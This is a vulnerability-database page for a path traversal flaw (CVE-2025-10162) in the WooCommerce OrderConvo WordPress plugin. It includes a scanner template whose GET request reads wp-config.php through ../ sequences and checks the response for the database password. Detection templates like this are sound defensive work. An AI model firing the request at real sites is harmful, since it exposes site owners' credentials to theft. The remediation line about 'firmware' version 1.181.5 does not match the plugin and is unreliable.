/Vulnerability Library

WordPress OrderConvo < 14 - Path Traversal

CVE-2025-10162
Verified

Description

WooCommerce OrderConvo WordPress plugin \u003C 14 contains a path traversal vulnerability caused by improper validation of file download paths, letting unauthenticated attackers read or download arbitrary files remotely

Severity

High

CVSS Score

7.5

Exploit Probability

4%

Published Date

May 4, 2026

Template Author

0x_akoko

CVE-2025-10162.yaml
id: CVE-2025-10162

info:
  name: WordPress OrderConvo < 14 - Path Traversal
  author: 0x_Akoko
  severity: high
  description: |
   WooCommerce OrderConvo WordPress plugin \u003C 14 contains a path traversal vulnerability caused by improper validation of file download paths, letting unauthenticated attackers read or download arbitrary files remotely
  impact: |
   Unauthenticated attackers can read or download arbitrary files, potentially exposing sensitive information.
  remediation: |
   Update firmware to a version later than 1.181.5 or the latest available version.
  reference:
    - https://wpscan.com/vulnerability/f878615d-955d-4365-87e0-6c928f548986/
    - https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-10162
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-10162
    cwe-id: CWE-22
    epss-score: 0.03632
    epss-percentile: 0.88154
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2025,wp,wp-plugin,wordpress,woocommerce,orderconvo,wooconvo,lfi,traversal,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wooconvo/v1/download-file?order_id=1&filename=../../../../wp-config.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402202fd728353bd5cabfcfc22370c95888e587ee7fea0b5981663bb17efabbba3ab60220467eff0629dd13149147b9744ca9bbfdfc9315b94972eb23300e278ec9597d5e:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2025-10162
CWE ID:
cwe-22

References

https://wpscan.com/vulnerability/f878615d-955d-4365-87e0-6c928f548986/https://wordpress.org/plugins/admin-and-client-message-after-order-for-woocommerce/https://nvd.nist.gov/vuln/detail/CVE-2025-10162

Remediation Steps

Update firmware to a version later than 1.181.5 or the latest available version.